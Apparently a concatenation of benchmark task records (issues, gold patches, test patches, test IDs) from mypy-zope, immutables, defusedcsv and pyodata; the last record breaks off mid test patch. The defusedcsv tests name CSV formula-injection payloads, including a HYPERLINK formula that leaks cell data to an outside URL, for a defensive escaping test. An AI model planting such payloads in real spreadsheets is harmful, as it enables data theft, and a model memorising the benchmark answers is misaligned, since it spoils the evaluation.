"tests/training/test_strategies.py::StrategyTest::test_joint",
"tests/training/test_strategies.py::StrategyTest::test_lfl",
"tests/training/test_strategies.py::StrategyTest::test_lwf",
"tests/training/test_strategies.py::StrategyTest::test_mas",
"tests/training/test_strategies.py::StrategyTest::test_naive",
"tests/training/test_strategies.py::StrategyTest::test_pnn",
"tests/training/test_strategies.py::StrategyTest::test_replay",
"tests/training/test_strategies.py::StrategyTest::test_slda",
"tests/training/test_strategies.py::StrategyTest::test_synaptic_intelligence",
"tests/training/test_strategies.py::StrategyTest::test_warning_slda_lwf"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-21 16:04:01+00:00
|
mit
| 147
|
|
Shoobx__mypy-zope-88
|
diff --git a/src/mypy_zope/plugin.py b/src/mypy_zope/plugin.py
index 46bdc1b..0c7971e 100644
--- a/src/mypy_zope/plugin.py
+++ b/src/mypy_zope/plugin.py
@@ -698,7 +698,10 @@ class ZopeInterfacePlugin(Plugin):
if not any(promote in ti._promote for ti in impl.mro):
faketi = TypeInfo(SymbolTable(), iface.defn, iface.module_name)
faketi._promote = [promote]
- impl.mro.append(faketi)
+ faketi.metaclass_type = iface.metaclass_type
+ # Insert the TypeInfo before the builtins.object that's at the end.
+ assert impl.mro[-1].fullname == 'builtins.object'
+ impl.mro.insert(len(impl.mro) - 1, faketi)
def plugin(version: str) -> PyType[Plugin]:
|
Shoobx/mypy-zope
|
3c767525b740a35e7039bf792ccfbce8590044d7
|
diff --git a/tests/test_mro_calculation.py b/tests/test_mro_calculation.py
index a051dcc..eb9cf5d 100644
--- a/tests/test_mro_calculation.py
+++ b/tests/test_mro_calculation.py
@@ -59,10 +59,10 @@ def test_mro_computation_in_forward_reference_to_implementer(mypy_cache_dir: str
mro: List[TypeInfo] = node.node.mro
# Expected: [
# <TypeInfo forward_reference_to_implementer.Protocol@21>,
- # <TypeInfo builtins.object>,
# <TypeInfo forward_reference_to_implementer.IProtocol>,
+ # <TypeInfo builtins.object>,
# ]
assert len(mro) == 3
assert mro[0].fullname.startswith(f"{sample_name}.Protocol")
- assert mro[1].fullname == "builtins.object"
- assert mro[2].fullname == f"{sample_name}.IProtocol"
+ assert mro[1].fullname == f"{sample_name}.IProtocol"
+ assert mro[2].fullname == "builtins.object"
|
Caching error (Metaclass conflict) with mypy 0.991
Hi. With the latest version of mypy (0.991) and mypy-zope (0.3.11) we're getting mypy errors that I think are cache related. The error goes away after `rm -rf .mypy_cache`
Here's the easiest repro I could make:
iface.py
```
from zope.interface import Interface
from zope.interface import implementer

class ISomething(Interface):
    pass

class ISomething2(Interface):
    pass

@implementer(ISomething)
class OneInterface:
    pass

@implementer(ISomething, ISomething2)
class TwoInterfaces:
    pass
```
foo.py
```
from iface import OneInterface, TwoInterfaces

class Good(OneInterface):
    pass

class Bad(TwoInterfaces):
    pass
```
I am able to reliably hit the problem by running the following commands:
```
$ rm -rf .mypy_cache
$ mypy iface.py
Success: no issues found in 1 source file
$ mypy foo.py
foo.py:6: error: Metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases [misc]
Found 1 error in 1 file (checked 1 source file)
```
As you can tell this only happens when there are multiple interfaces.
|
0.0
|
3c767525b740a35e7039bf792ccfbce8590044d7
|
[
"tests/test_mro_calculation.py::test_mro_computation_in_forward_reference_to_implementer"
] |
[] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2023-02-08 00:06:06+00:00
|
mit
| 706
|
|
MagicStack__immutables-58
|
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index c992bda..7e2c51b 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -45,13 +45,13 @@ jobs:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 50
submodules: true
- name: Set up Python 3.7
- uses: actions/setup-python@v1
+ uses: actions/setup-python@v2
with:
python-version: 3.7
@@ -70,7 +70,7 @@ jobs:
runs-on: ${{ matrix.os }}
strategy:
matrix:
- python-version: [3.5, 3.6, 3.7, 3.8]
+ python-version: [3.5, 3.6, 3.7, 3.8, 3.9]
os: [ubuntu-16.04, macos-latest, windows-latest]
exclude:
# Python 3.5 is unable to properly
@@ -80,13 +80,13 @@ jobs:
python-version: 3.5
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 50
submodules: true
- name: Set up Python ${{ matrix.python-version }}
- uses: actions/setup-python@v1
+ uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
@@ -130,7 +130,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 5
submodules: false
diff --git a/README.rst b/README.rst
index e62545e..4132bc0 100644
--- a/README.rst
+++ b/README.rst
@@ -12,7 +12,8 @@ An immutable mapping type for Python.
The underlying datastructure is a Hash Array Mapped Trie (HAMT)
used in Clojure, Scala, Haskell, and other functional languages.
This implementation is used in CPython 3.7 in the ``contextvars``
-module (see PEP 550 and PEP 567 for more details).
+module (see `PEP 550 <https://www.python.org/dev/peps/pep-0550/>`_ and
+`PEP 567 <https://www.python.org/dev/peps/pep-0567/>`_ for more details).
Immutable mappings based on HAMT have O(log N) performance for both
``set()`` and ``get()`` operations, which is essentially O(1) for
diff --git a/immutables/_map.c b/immutables/_map.c
index 9f0a586..7e510fd 100644
--- a/immutables/_map.c
+++ b/immutables/_map.c
@@ -3194,14 +3194,14 @@ map_py_repr(BaseMapObject *m)
if (MapMutation_Check(m)) {
if (_PyUnicodeWriter_WriteASCIIString(
- &writer, "<immutables.MapMutation({", 25) < 0)
+ &writer, "immutables.MapMutation({", 24) < 0)
{
goto error;
}
}
else {
if (_PyUnicodeWriter_WriteASCIIString(
- &writer, "<immutables.Map({", 17) < 0)
+ &writer, "immutables.Map({", 16) < 0)
{
goto error;
}
@@ -3255,16 +3255,6 @@ map_py_repr(BaseMapObject *m)
goto error;
}
- PyObject *addr = PyUnicode_FromFormat(" at %p>", m);
- if (addr == NULL) {
- goto error;
- }
- if (_PyUnicodeWriter_WriteStr(&writer, addr) < 0) {
- Py_DECREF(addr);
- goto error;
- }
- Py_DECREF(addr);
-
Py_ReprLeave((PyObject *)m);
return _PyUnicodeWriter_Finish(&writer);
diff --git a/immutables/map.py b/immutables/map.py
index 7c16139..fe9dbaf 100644
--- a/immutables/map.py
+++ b/immutables/map.py
@@ -649,8 +649,7 @@ class Map:
items = []
for key, val in self.items():
items.append("{!r}: {!r}".format(key, val))
- return '<immutables.Map({{{}}}) at 0x{:0x}>'.format(
- ', '.join(items), id(self))
+ return 'immutables.Map({{{}}})'.format(', '.join(items))
def __dump__(self): # pragma: no cover
buf = []
@@ -818,8 +817,7 @@ class MapMutation:
items = []
for key, val in self.__root.items():
items.append("{!r}: {!r}".format(key, val))
- return '<immutables.MapMutation({{{}}}) at 0x{:0x}>'.format(
- ', '.join(items), id(self))
+ return 'immutables.MapMutation({{{}}})'.format(', '.join(items))
def __len__(self):
return self.__count
diff --git a/setup.py b/setup.py
index b54270d..cb31d2c 100644
--- a/setup.py
+++ b/setup.py
@@ -59,6 +59,7 @@ setuptools.setup(
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
+ 'Programming Language :: Python :: 3.9',
'Operating System :: POSIX',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
|
MagicStack/immutables
|
45105ecd8b56a4d88dbcb380fcb8ff4b9cc7b19c
|
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 45367be..019007f 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -15,7 +15,7 @@ jobs:
strategy:
max-parallel: 4
matrix:
- python-version: [3.5, 3.6, 3.7, 3.8]
+ python-version: [3.5, 3.6, 3.7, 3.8, 3.9]
os: [windows-latest, ubuntu-18.04, macos-latest]
exclude:
# Python 3.5 is unable to properly
@@ -25,7 +25,7 @@ jobs:
python-version: 3.5
steps:
- - uses: actions/checkout@v1
+ - uses: actions/checkout@v2
with:
fetch-depth: 50
submodules: true
@@ -41,7 +41,7 @@ jobs:
__version__\s*=\s*(?:['"])([[:PEP440:]])(?:['"])
- name: Set up Python ${{ matrix.python-version }}
- uses: actions/setup-python@v1
+ uses: actions/setup-python@v2
if: steps.release.outputs.version == 0
with:
python-version: ${{ matrix.python-version }}
diff --git a/tests/test_map.py b/tests/test_map.py
index b6ee7f1..4a473b3 100644
--- a/tests/test_map.py
+++ b/tests/test_map.py
@@ -845,11 +845,10 @@ class BaseMapTest:
def test_repr_1(self):
h = self.Map()
- self.assertTrue(repr(h).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(h), 'immutables.Map({})')
h = h.set(1, 2).set(2, 3).set(3, 4)
- self.assertTrue(repr(h).startswith(
- '<immutables.Map({1: 2, 2: 3, 3: 4}) at 0x'))
+ self.assertEqual(repr(h), 'immutables.Map({1: 2, 2: 3, 3: 4})')
def test_repr_2(self):
h = self.Map()
@@ -879,8 +878,7 @@ class BaseMapTest:
h = h.set(k, 1)
k.val = h
- self.assertTrue(repr(h).startswith(
- '<immutables.Map({{...}: 1}) at 0x'))
+ self.assertEqual(repr(h), 'immutables.Map({{...}: 1})')
def test_hash_1(self):
h = self.Map()
@@ -964,8 +962,7 @@ class BaseMapTest:
h = h.set('a', 1)
hm1 = h.mutate()
- self.assertTrue(repr(hm1).startswith(
- "<immutables.MapMutation({'a': 1})"))
+ self.assertEqual(repr(hm1), "immutables.MapMutation({'a': 1})")
with self.assertRaisesRegex(TypeError, 'unhashable type'):
hash(hm1)
diff --git a/tests/test_none_keys.py b/tests/test_none_keys.py
index f7969f3..92e7813 100644
--- a/tests/test_none_keys.py
+++ b/tests/test_none_keys.py
@@ -61,7 +61,7 @@ class BaseNoneTest:
self.assertEqual(len(m), 1)
self.assertTrue(None in m)
self.assertEqual(m[None], 1)
- self.assertTrue(repr(m).startswith('<immutables.Map({None: 1}) at 0x'))
+ self.assertEqual(repr(m), 'immutables.Map({None: 1})')
for level in range(7):
key = NoneCollision('a', level)
@@ -72,7 +72,7 @@ class BaseNoneTest:
m = m.delete(None)
self.assertEqual(len(m), 0)
self.assertFalse(None in m)
- self.assertTrue(repr(m).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(m), 'immutables.Map({})')
self.assertEqual(m, self.Map())
@@ -125,7 +125,7 @@ class BaseNoneTest:
self.assertFalse(None in m3)
self.assertFalse(key in m3)
self.assertEqual(m3, self.Map())
- self.assertTrue(repr(m3).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(m3), 'immutables.Map({})')
with self.assertRaises(KeyError):
m3.delete(None)
with self.assertRaises(KeyError):
@@ -144,7 +144,7 @@ class BaseNoneTest:
self.assertFalse(None in m4)
self.assertFalse(key in m4)
self.assertEqual(m4, self.Map())
- self.assertTrue(repr(m4).startswith('<immutables.Map({}) at 0x'))
+ self.assertEqual(repr(m4), 'immutables.Map({})')
with self.assertRaises(KeyError):
m4.delete(None)
with self.assertRaises(KeyError):
|
`immutables.Map.__str__` doesn't match `dict.__str__`
```python
In [7]: d = {'a': 1}
In [8]: str(d)
Out[8]: "{'a': 1}"
In [9]: str(immutables.Map(d))
Out[9]: "<immutables.Map({'a': 1}) at 0x108ed56c0>"
```
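The fix is to make `__repr__` render the items the way `dict` does and drop the `<... at 0x...>` address wrapper. A tiny sketch of that repr style on a stand-in mapping class (not the actual immutables code):
```python
class MiniMap:
    def __init__(self, data=()):
        self._data = dict(data)

    def __repr__(self):
        items = ', '.join('{!r}: {!r}'.format(k, v) for k, v in self._data.items())
        return 'immutables.Map({{{}}})'.format(items)

print(repr(MiniMap({'a': 1})))   # immutables.Map({'a': 1})
```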
|
0.0
|
45105ecd8b56a4d88dbcb380fcb8ff4b9cc7b19c
|
[
"tests/test_map.py::PyMapTest::test_map_mut_3",
"tests/test_map.py::PyMapTest::test_repr_1",
"tests/test_map.py::PyMapTest::test_repr_3",
"tests/test_none_keys.py::PyMapNoneTest::test_none_as_key",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collision_1"
] |
[
"tests/test_map.py::PyMapTest::test_abc_1",
"tests/test_map.py::PyMapTest::test_hash_1",
"tests/test_map.py::PyMapTest::test_hash_2",
"tests/test_map.py::PyMapTest::test_hashkey_helper_1",
"tests/test_map.py::PyMapTest::test_kwarg_named_col",
"tests/test_map.py::PyMapTest::test_map_basics_1",
"tests/test_map.py::PyMapTest::test_map_basics_2",
"tests/test_map.py::PyMapTest::test_map_basics_3",
"tests/test_map.py::PyMapTest::test_map_basics_4",
"tests/test_map.py::PyMapTest::test_map_collision_1",
"tests/test_map.py::PyMapTest::test_map_collision_2",
"tests/test_map.py::PyMapTest::test_map_delete_1",
"tests/test_map.py::PyMapTest::test_map_delete_2",
"tests/test_map.py::PyMapTest::test_map_delete_3",
"tests/test_map.py::PyMapTest::test_map_delete_4",
"tests/test_map.py::PyMapTest::test_map_delete_5",
"tests/test_map.py::PyMapTest::test_map_delete_6",
"tests/test_map.py::PyMapTest::test_map_eq_1",
"tests/test_map.py::PyMapTest::test_map_eq_2",
"tests/test_map.py::PyMapTest::test_map_eq_3",
"tests/test_map.py::PyMapTest::test_map_gc_1",
"tests/test_map.py::PyMapTest::test_map_gc_2",
"tests/test_map.py::PyMapTest::test_map_getitem_1",
"tests/test_map.py::PyMapTest::test_map_in_1",
"tests/test_map.py::PyMapTest::test_map_is_subscriptable",
"tests/test_map.py::PyMapTest::test_map_items_1",
"tests/test_map.py::PyMapTest::test_map_items_2",
"tests/test_map.py::PyMapTest::test_map_items_3",
"tests/test_map.py::PyMapTest::test_map_items_4",
"tests/test_map.py::PyMapTest::test_map_keys_1",
"tests/test_map.py::PyMapTest::test_map_keys_2",
"tests/test_map.py::PyMapTest::test_map_mut_1",
"tests/test_map.py::PyMapTest::test_map_mut_10",
"tests/test_map.py::PyMapTest::test_map_mut_11",
"tests/test_map.py::PyMapTest::test_map_mut_12",
"tests/test_map.py::PyMapTest::test_map_mut_13",
"tests/test_map.py::PyMapTest::test_map_mut_14",
"tests/test_map.py::PyMapTest::test_map_mut_15",
"tests/test_map.py::PyMapTest::test_map_mut_16",
"tests/test_map.py::PyMapTest::test_map_mut_17",
"tests/test_map.py::PyMapTest::test_map_mut_18",
"tests/test_map.py::PyMapTest::test_map_mut_19",
"tests/test_map.py::PyMapTest::test_map_mut_2",
"tests/test_map.py::PyMapTest::test_map_mut_20",
"tests/test_map.py::PyMapTest::test_map_mut_21",
"tests/test_map.py::PyMapTest::test_map_mut_4",
"tests/test_map.py::PyMapTest::test_map_mut_5",
"tests/test_map.py::PyMapTest::test_map_mut_6",
"tests/test_map.py::PyMapTest::test_map_mut_7",
"tests/test_map.py::PyMapTest::test_map_mut_8",
"tests/test_map.py::PyMapTest::test_map_mut_9",
"tests/test_map.py::PyMapTest::test_map_mut_stress",
"tests/test_map.py::PyMapTest::test_map_pickle",
"tests/test_map.py::PyMapTest::test_map_stress_01",
"tests/test_map.py::PyMapTest::test_map_stress_02",
"tests/test_map.py::PyMapTest::test_map_values_1",
"tests/test_map.py::PyMapTest::test_map_values_2",
"tests/test_map.py::PyMapTest::test_repr_2",
"tests/test_map.py::CMapTest::test_abc_1",
"tests/test_map.py::CMapTest::test_hash_1",
"tests/test_map.py::CMapTest::test_hash_2",
"tests/test_map.py::CMapTest::test_hashkey_helper_1",
"tests/test_map.py::CMapTest::test_kwarg_named_col",
"tests/test_map.py::CMapTest::test_map_basics_1",
"tests/test_map.py::CMapTest::test_map_basics_2",
"tests/test_map.py::CMapTest::test_map_basics_3",
"tests/test_map.py::CMapTest::test_map_basics_4",
"tests/test_map.py::CMapTest::test_map_collision_1",
"tests/test_map.py::CMapTest::test_map_collision_2",
"tests/test_map.py::CMapTest::test_map_delete_1",
"tests/test_map.py::CMapTest::test_map_delete_2",
"tests/test_map.py::CMapTest::test_map_delete_3",
"tests/test_map.py::CMapTest::test_map_delete_4",
"tests/test_map.py::CMapTest::test_map_delete_5",
"tests/test_map.py::CMapTest::test_map_delete_6",
"tests/test_map.py::CMapTest::test_map_eq_1",
"tests/test_map.py::CMapTest::test_map_eq_2",
"tests/test_map.py::CMapTest::test_map_eq_3",
"tests/test_map.py::CMapTest::test_map_gc_1",
"tests/test_map.py::CMapTest::test_map_gc_2",
"tests/test_map.py::CMapTest::test_map_getitem_1",
"tests/test_map.py::CMapTest::test_map_in_1",
"tests/test_map.py::CMapTest::test_map_is_subscriptable",
"tests/test_map.py::CMapTest::test_map_items_1",
"tests/test_map.py::CMapTest::test_map_items_2",
"tests/test_map.py::CMapTest::test_map_items_3",
"tests/test_map.py::CMapTest::test_map_items_4",
"tests/test_map.py::CMapTest::test_map_keys_1",
"tests/test_map.py::CMapTest::test_map_keys_2",
"tests/test_map.py::CMapTest::test_map_mut_1",
"tests/test_map.py::CMapTest::test_map_mut_10",
"tests/test_map.py::CMapTest::test_map_mut_11",
"tests/test_map.py::CMapTest::test_map_mut_12",
"tests/test_map.py::CMapTest::test_map_mut_13",
"tests/test_map.py::CMapTest::test_map_mut_14",
"tests/test_map.py::CMapTest::test_map_mut_15",
"tests/test_map.py::CMapTest::test_map_mut_16",
"tests/test_map.py::CMapTest::test_map_mut_17",
"tests/test_map.py::CMapTest::test_map_mut_18",
"tests/test_map.py::CMapTest::test_map_mut_19",
"tests/test_map.py::CMapTest::test_map_mut_2",
"tests/test_map.py::CMapTest::test_map_mut_20",
"tests/test_map.py::CMapTest::test_map_mut_21",
"tests/test_map.py::CMapTest::test_map_mut_4",
"tests/test_map.py::CMapTest::test_map_mut_5",
"tests/test_map.py::CMapTest::test_map_mut_6",
"tests/test_map.py::CMapTest::test_map_mut_7",
"tests/test_map.py::CMapTest::test_map_mut_8",
"tests/test_map.py::CMapTest::test_map_mut_9",
"tests/test_map.py::CMapTest::test_map_mut_stress",
"tests/test_map.py::CMapTest::test_map_pickle",
"tests/test_map.py::CMapTest::test_map_stress_01",
"tests/test_map.py::CMapTest::test_map_stress_02",
"tests/test_map.py::CMapTest::test_map_values_1",
"tests/test_map.py::CMapTest::test_map_values_2",
"tests/test_map.py::CMapTest::test_repr_2",
"tests/test_none_keys.py::PyMapNoneTest::test_collision_4",
"tests/test_none_keys.py::PyMapNoneTest::test_iterators",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collision_2",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collision_3",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collisions",
"tests/test_none_keys.py::PyMapNoneTest::test_none_mutation",
"tests/test_none_keys.py::PyMapNoneTest::test_none_set",
"tests/test_none_keys.py::CMapNoneTest::test_collision_4",
"tests/test_none_keys.py::CMapNoneTest::test_iterators",
"tests/test_none_keys.py::CMapNoneTest::test_none_collision_2",
"tests/test_none_keys.py::CMapNoneTest::test_none_collision_3",
"tests/test_none_keys.py::CMapNoneTest::test_none_collisions",
"tests/test_none_keys.py::CMapNoneTest::test_none_mutation",
"tests/test_none_keys.py::CMapNoneTest::test_none_set"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-02-08 17:28:05+00:00
|
apache-2.0
| 335
|
|
raphaelm__defusedcsv-6
|
diff --git a/defusedcsv/csv.py b/defusedcsv/csv.py
index 2656c96..a027b85 100644
--- a/defusedcsv/csv.py
+++ b/defusedcsv/csv.py
@@ -1,20 +1,28 @@
import re
from csv import (
QUOTE_ALL, QUOTE_MINIMAL, QUOTE_NONE, QUOTE_NONNUMERIC, Dialect,
- DictReader, DictWriter as BaseDictWriter, Error, Sniffer, excel, excel_tab,
+ DictReader, DictWriter as _BaseDictWriter, Error, Sniffer, excel, excel_tab,
field_size_limit, get_dialect, list_dialects, reader, register_dialect,
- unix_dialect, unregister_dialect, writer as basewriter,
+ unix_dialect, unregister_dialect, writer as _basewriter,
+ __doc__,
)
+from numbers import Number
+
+from . import version as __version__
__all__ = ["QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",
- "Error", "Dialect", "excel", "excel_tab", "field_size_limit", "reader", "writer",
+ "Error", "Dialect", "__doc__", "excel", "excel_tab",
+ "field_size_limit", "reader", "writer",
"register_dialect", "get_dialect", "list_dialects", "Sniffer",
- "unregister_dialect", "DictReader", "DictWriter", "unix_dialect"]
+ "unregister_dialect", "__version__", "DictReader", "DictWriter",
+ "unix_dialect"]
-def escape(payload):
+def _escape(payload):
if payload is None:
return ''
+ if isinstance(payload, Number):
+ return payload
payload = str(payload)
if payload and payload[0] in ('@', '+', '-', '=', '|', '%') and not re.match("^-?[0-9,\\.]+$", payload):
@@ -23,25 +31,30 @@ def escape(payload):
return payload
-class ProxyWriter:
+class _ProxyWriter:
def __init__(self, writer):
self.writer = writer
def writerow(self, row):
- self.writer.writerow([escape(field) for field in row])
+ try:
+ iter(row)
+ except TypeError as err:
+ msg = "iterable expected, not %s" % type(row).__name__
+ raise Error(msg) from err
+ return self.writer.writerow([_escape(field) for field in row])
def writerows(self, rows):
- self.writer.writerows([[escape(field) for field in row] for row in rows])
+ return self.writer.writerows([[_escape(field) for field in row] for row in rows])
def __getattr__(self, item):
return getattr(self.writer, item)
def writer(csvfile, dialect='excel', **fmtparams):
- return ProxyWriter(basewriter(csvfile, dialect, **fmtparams))
+ return _ProxyWriter(_basewriter(csvfile, dialect, **fmtparams))
-class DictWriter(BaseDictWriter):
+class DictWriter(_BaseDictWriter):
def __init__(self, f, fieldnames, restval="", extrasaction="raise",
dialect="excel", *args, **kwds):
super().__init__(f, fieldnames, restval, extrasaction, dialect, *args, **kwds)
|
raphaelm/defusedcsv
|
26062bce682fa1ff99d43bde8332fb6e6ac970c0
|
diff --git a/tests/test_escape.py b/tests/test_escape.py
index fa14347..93e2a50 100644
--- a/tests/test_escape.py
+++ b/tests/test_escape.py
@@ -1,5 +1,5 @@
import pytest
-from defusedcsv.csv import escape
+from defusedcsv.csv import _escape as escape
@pytest.mark.parametrize("input,expected", [
@@ -44,9 +44,14 @@ def test_dangerous_sample_payloads(input, expected):
"Test | Foo",
"",
None,
+])
+def test_safe_sample_payloads(input):
+ assert escape(input) == (str(input) if input is not None else '')
+
+@pytest.mark.parametrize("input", [
1,
2,
True
])
-def test_safe_sample_payloads(input):
- assert escape(input) == (str(input) if input is not None else '')
+def test_safe_nonstr_sample_payloads(input):
+ assert escape(input) == input
diff --git a/tests/test_unmodified.py b/tests/test_unmodified.py
index e1d1326..e2548c3 100644
--- a/tests/test_unmodified.py
+++ b/tests/test_unmodified.py
@@ -32,6 +32,9 @@ def test_has_attributes():
assert hasattr(csv, 'QUOTE_NONNUMERIC')
assert hasattr(csv, 'QUOTE_NONE')
assert hasattr(csv, 'Error')
+ assert hasattr(csv, 'writer')
+ assert hasattr(csv, '__doc__')
+ assert hasattr(csv, '__version__')
def test_dialect_registry():
|
writer.writerow() does not return anything
The stdlib python csv writer will return the row (as string) when calling `writer.writerow(row)`. The `defusedcsv` proxy is not handing the value along though.
```
from defusedcsv import csv

class EchoWriter:
    def write(self, value):
        return value

pseudo_buffer = EchoWriter()
writer = csv.writer(pseudo_buffer)
value = writer.writerow(["foo", "bar"])
```
That returns `None`. When using stock `csv`, it'll return `"foo,bar"`.
I admit, the above example may be a bit convoluted and there may be better ways to do this. However for maximum compatibility with the stdlib csv library it might make sense to mimic this behaviour.
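A small sketch of the behaviour being asked for: a proxy writer that still escapes every field but forwards whatever the underlying `csv.writer.writerow()` returns (here `str` stands in for the real escaping function; this is not defusedcsv's actual code):
```python
import csv
import io

class ProxyWriter:
    def __init__(self, writer, escape):
        self._writer = writer
        self._escape = escape

    def writerow(self, row):
        # forward the underlying writer's return value instead of dropping it
        return self._writer.writerow([self._escape(field) for field in row])

buf = io.StringIO()
writer = ProxyWriter(csv.writer(buf), escape=str)
print(writer.writerow(["foo", "bar"]))   # number of characters written, e.g. 9
```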
|
0.0
|
26062bce682fa1ff99d43bde8332fb6e6ac970c0
|
[
"tests/test_escape.py::test_dangerous_sample_payloads[=1+1-'=1+1_0]",
"tests/test_escape.py::test_dangerous_sample_payloads[-1+1-'-1+1]",
"tests/test_escape.py::test_dangerous_sample_payloads[+1+1-'+1+1]",
"tests/test_escape.py::test_dangerous_sample_payloads[=1+1-'=1+1_1]",
"tests/test_escape.py::test_dangerous_sample_payloads[@A3-'@A3]",
"tests/test_escape.py::test_dangerous_sample_payloads[%1-'%1]",
"tests/test_escape.py::test_dangerous_sample_payloads[|1+1-'\\\\|1+1]",
"tests/test_escape.py::test_dangerous_sample_payloads[=1|2-'=1\\\\|2]",
"tests/test_escape.py::test_dangerous_sample_payloads[=cmd|'",
"tests/test_escape.py::test_dangerous_sample_payloads[@SUM(1+1)*cmd|'",
"tests/test_escape.py::test_dangerous_sample_payloads[-2+3+cmd|'",
"tests/test_escape.py::test_dangerous_sample_payloads[=HYPERLINK(\"http://contextis.co.uk?leak=\"&A1&A2,\"Error:",
"tests/test_escape.py::test_safe_sample_payloads[1+2]",
"tests/test_escape.py::test_safe_sample_payloads[1]",
"tests/test_escape.py::test_safe_sample_payloads[Foo]",
"tests/test_escape.py::test_safe_sample_payloads[1.3]",
"tests/test_escape.py::test_safe_sample_payloads[1,2]",
"tests/test_escape.py::test_safe_sample_payloads[-1.3]",
"tests/test_escape.py::test_safe_sample_payloads[-1,2]",
"tests/test_escape.py::test_safe_sample_payloads[Foo",
"tests/test_escape.py::test_safe_sample_payloads[1-2]",
"tests/test_escape.py::test_safe_sample_payloads[1=3]",
"tests/test_escape.py::test_safe_sample_payloads[foo@example.org]",
"tests/test_escape.py::test_safe_sample_payloads[19.00",
"tests/test_escape.py::test_safe_sample_payloads[Test",
"tests/test_escape.py::test_safe_sample_payloads[]",
"tests/test_escape.py::test_safe_sample_payloads[None]",
"tests/test_escape.py::test_safe_nonstr_sample_payloads[1]",
"tests/test_escape.py::test_safe_nonstr_sample_payloads[2]",
"tests/test_escape.py::test_safe_nonstr_sample_payloads[True]",
"tests/test_unmodified.py::test_read",
"tests/test_unmodified.py::test_has_attributes",
"tests/test_unmodified.py::test_dialect_registry"
] |
[] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-04-08 12:22:53+00:00
|
apache-2.0
| 5,174
|
|
SAP__python-pyodata-149
|
diff --git a/pyodata/v2/model.py b/pyodata/v2/model.py
index 5412ca9..67cc1ad 100644
--- a/pyodata/v2/model.py
+++ b/pyodata/v2/model.py
@@ -21,6 +21,8 @@ from lxml import etree
from pyodata.exceptions import PyODataException, PyODataModelError, PyODataParserError
LOGGER_NAME = 'pyodata.model'
+FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = False
+FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = False
IdentifierInfo = collections.namedtuple('IdentifierInfo', 'namespace name')
TypeInfo = collections.namedtuple('TypeInfo', 'namespace name is_collection')
@@ -414,8 +416,19 @@ class EdmDateTimeTypTraits(EdmPrefixedTypTraits):
try:
# https://stackoverflow.com/questions/36179914/timestamp-out-of-range-for-platform-localtime-gmtime-function
value = datetime.datetime(1970, 1, 1, tzinfo=current_timezone()) + datetime.timedelta(milliseconds=int(value))
- except ValueError:
- raise PyODataModelError(f'Cannot decode datetime from value {value}.')
+ except (ValueError, OverflowError):
+ if FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE and int(value) < -62135596800000:
+ # Some service providers return false minimal date values.
+ # -62135596800000 is the lowest value PyOData could read.
+ # This workaroud fixes this issue and returns 0001-01-01 00:00:00+00:00 in such a case.
+ value = datetime.datetime(year=1, day=1, month=1, tzinfo=current_timezone())
+ elif FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE and int(value) > 253402300799999:
+ value = datetime.datetime(year=9999, day=31, month=12, tzinfo=current_timezone())
+ else:
+ raise PyODataModelError(f'Cannot decode datetime from value {value}. '
+ f'Possible value range: -62135596800000 to 253402300799999. '
+ f'You may fix this by setting `FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE` '
+ f' or `FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE` as a workaround.')
return value
|
SAP/python-pyodata
|
9a3694d553c64e781923e11f6fbc28af67b01bc3
|
diff --git a/tests/test_model_v2.py b/tests/test_model_v2.py
index ca72430..8f7ecef 100644
--- a/tests/test_model_v2.py
+++ b/tests/test_model_v2.py
@@ -9,6 +9,7 @@ from pyodata.v2.model import Schema, Typ, StructTypeProperty, Types, EntityType,
PolicyIgnore, Config, PolicyFatal, NullType, NullAssociation, current_timezone, StructType
from pyodata.exceptions import PyODataException, PyODataModelError, PyODataParserError
from tests.conftest import assert_logging_policy
+import pyodata.v2.model
def test_edmx(schema):
@@ -537,10 +538,20 @@ def test_traits_datetime():
assert testdate.microsecond == 0
assert testdate.tzinfo == current_timezone()
+ # parsing below lowest value with workaround
+ pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = True
+ testdate = typ.traits.from_json("/Date(-62135596800001)/")
+ assert testdate.year == 1
+ assert testdate.month == 1
+ assert testdate.day == 1
+ assert testdate.tzinfo == current_timezone()
+
# parsing the lowest value
- with pytest.raises(OverflowError):
+ pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = False
+ with pytest.raises(PyODataModelError) as e_info:
typ.traits.from_json("/Date(-62135596800001)/")
-
+ assert str(e_info.value).startswith('Cannot decode datetime from value -62135596800001.')
+
